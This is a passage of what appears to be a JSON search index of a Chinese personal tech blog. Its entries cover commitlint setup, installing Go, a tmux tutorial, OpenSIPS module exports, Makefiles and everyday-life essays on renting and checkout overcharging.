flash_player_admin_guide.pdf\n","permalink":"https://wdd.js.org/posts/2020/09/thg9yu/","summary":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf","title":"flash_player_admin_guide"},{"content":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续继承工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.18.3) ⧗ input: 00 ✖ subject may not be empty [subject-empty] ✖ type may not be empty [type-empty] ✖ found 2 problems, 0 warnings ⓘ Get help: https://github.com/conventional-changelog/commitlint/#what-is-commitlint 根据commitlog生成changelog 下面命令中的1.5.5 1.5.10可以是两个tag, 也可以是两个分支。\ngit log 可以提取两个点之间的commitlog, 使用\u0026hellip;\ngit log --pretty=format:\u0026#34;[%h] %s (%an)\u0026#34; 1.5.5...1.5.10 | sort -k2,2 \u0026gt; changelog.md 参考 https://github.com/conventional-changelog/commitlint/tree/master/@commitlint/config-angular https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html ","permalink":"https://wdd.js.org/posts/2020/09/vu0ag0/","summary":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续继承工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.","title":"使用commitlint检查git提交信息是否合规"},{"content":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的连接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.com drwxr-xr-x 3 wangdd staff 96B Sep 14 09:17 golang.org 路径在GOPATH/pkg/mod 目录下\n4. cannot find module providing package github.com 在项目根目录执行\ngo mod init module_name 5. 选择什么Web框架 fiber 如果你要写一个web服务器,最快速的方式是挑选一个熟悉的框架。 如果你熟悉Node.js中的express框架,那你会非常快速的上手fiber,因为fiber就是参考express做的。\nhttps://github.com/gofiber/fiber\n6. 自动构建 air npm中有个包,叫做nodemon,它会在代码变更之后,重启服务器。\n如果你需要在golang中类似的功能,可以使用https://github.com/cosmtrek/air\n7. 如何查看官方库文档 go doc fmt | less ","permalink":"https://wdd.js.org/golang/golang-start-faq/","summary":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的连接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.","title":"Golang初学者的问题"},{"content":"在上海工作的人,除了一年一次的春运,就可能是就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要个各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要斤斤打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使能无法坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来处,如果转租不出去,你有确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。\n","permalink":"https://wdd.js.org/posts/2020/09/xglwgs/","summary":"在上海工作的人,除了一年一次的春运,就可能是就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要个各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要斤斤打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使能无法坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来处,如果转租不出去,你有确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。","title":"租房的检查清单"},{"content":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员褥羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说到:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说到:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛再做云计算,然后说:一共38块。\nshit! 很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被辱羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","permalink":"https://wdd.js.org/posts/2020/09/hpc6fy/","summary":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员褥羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说到:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说到:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛再做云计算,然后说:一共38块。\nshit! 很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被辱羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","title":"如何避免被收银员坑"},{"content":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","permalink":"https://wdd.js.org/posts/2020/09/upi47f/","summary":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","title":"IO性能 Node vs PHP vs Java vs Go"},{"content":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Terminue连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外边比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的的,有些人不知道那些好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tumx 后记 ","permalink":"https://wdd.js.org/posts/2020/09/rzumhc/","summary":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Terminue连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外边比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的的,有些人不知道那些好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tumx 后记 ","title":"使用iPad开发折腾记"},{"content":"早上六点多起床,搭乘半个小时的地铁,来到医院做体验。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。\n","permalink":"https://wdd.js.org/posts/2020/08/cs9htr/","summary":"早上六点多起床,搭乘半个小时的地铁,来到医院做体验。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。","title":"岁月的皮肤"},{"content":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。\n","permalink":"https://wdd.js.org/posts/2020/08/ybgr0g/","summary":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。","title":"从日漫到美漫"},{"content":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重要讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有那些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function\ntypedef int (*cmd_function)(struct sip_msg*, char*, char*, char*, char*, char*, char*); cmd_function与fixup_function的关系 cmd_function是在opensips运行后,在路由脚本中会执行到 fixup_function实际上是在opensips运行前,脚本解析完成后会执行 fixup_function的目的是在脚本解析阶段发现参数的问题,或者修改某些参数的值 真实的栗子:\nstatic cmd_export_t cmds[]={ {\u0026#34;lzc_change\u0026#34;, (cmd_function)change_code, 2, change_code_fix, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; static int change_code_fix(void** param, int param_no) { LM_INFO(\u0026#34;enter change_code_fix: param: %s\\n\u0026#34;, (char *)*param); LM_INFO(\u0026#34;enter change_code_fix: param_no: %d\\n\u0026#34;, param_no); LM_INFO(\u0026#34;enter change_code_fix: local_zone_code: %s len:%d\\n\u0026#34;, local_zone_code.s,local_zone_code.len); return 0; } 上面的定义,可以在opensips脚本中使用lzc_change这个函数。这个函数对应c代码里的change_code函数。这个函数允许接受2两个参数。\nopensips脚本\nroute{ lzc_change(\u0026#34;abcd\u0026#34;,\u0026#34;desf\u0026#34;); } debug日志:从日志可以看出来lzc_change有两个参数,change_code_fix被调用了两次,每次调用可以获取参数的值,和参数的序号。\nDBG:core:fix_actions: fixing lzc_change, opensips.mf2.cfg:18 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: abcd INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 1 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: desf INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 2 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 ","permalink":"https://wdd.js.org/opensips/module-dev/l5/","summary":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重要讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有那些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function","title":"概念理解 module_exports"},{"content":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","permalink":"https://wdd.js.org/posts/2020/08/rudtng/","summary":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","title":"统一入口Makefile"},{"content":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。\n在做代码对比,或者一遍参考另一个代码,一遍写当前代码时,可以考虑使用pane分屏。\n垂直分屏: ctrl-b % 水平分屏: ctrl-b \u0026quot; 依次切换: ctrl-b o 按箭头键切换: ctrl-b 箭头 重新布局: ctrl-b 空格键 最大化当前pane: ctrl-b z 关闭当前pane: ctrl-b x 将panne转为新的window: ctrl-b ! 显示Pannel编号 ctrl-b q 向左移动pannel ctrl-b { 向右移动pannel ctrl-b } resize panne\nresize-pane -D 20 resize down resize-pane -U 20 resize up resize-pane -L 20 resize left resize-pane -R 20 resize right 杂项 查看时间: ctrl-b t 内部操作 当你已经进入tmux时,如何新建一个session或者关闭一个session呢?\n新建session ctrl-b : 进入命令行模式,然后输入: new -s session-name 关闭sesssion ctrl-b : 进入命令行模式,然后输入: kill-session -t session-name tmux 设置活跃window的状态栏背景色 # tmux 1.x set-window-option -g window-status-current-bg red # tmux 2.9 setw -g window-status-current-style fg=black,bg=white 参考 https://unix.stackexchange.com/questions/210174/set-the-active-tmux-tab-color ","permalink":"https://wdd.js.org/posts/2020/08/osz3gu/","summary":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。","title":"tmux深度教学"},{"content":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","permalink":"https://wdd.js.org/posts/2020/08/lrzu06/","summary":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","title":"打造高可扩展性的微服务"},{"content":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 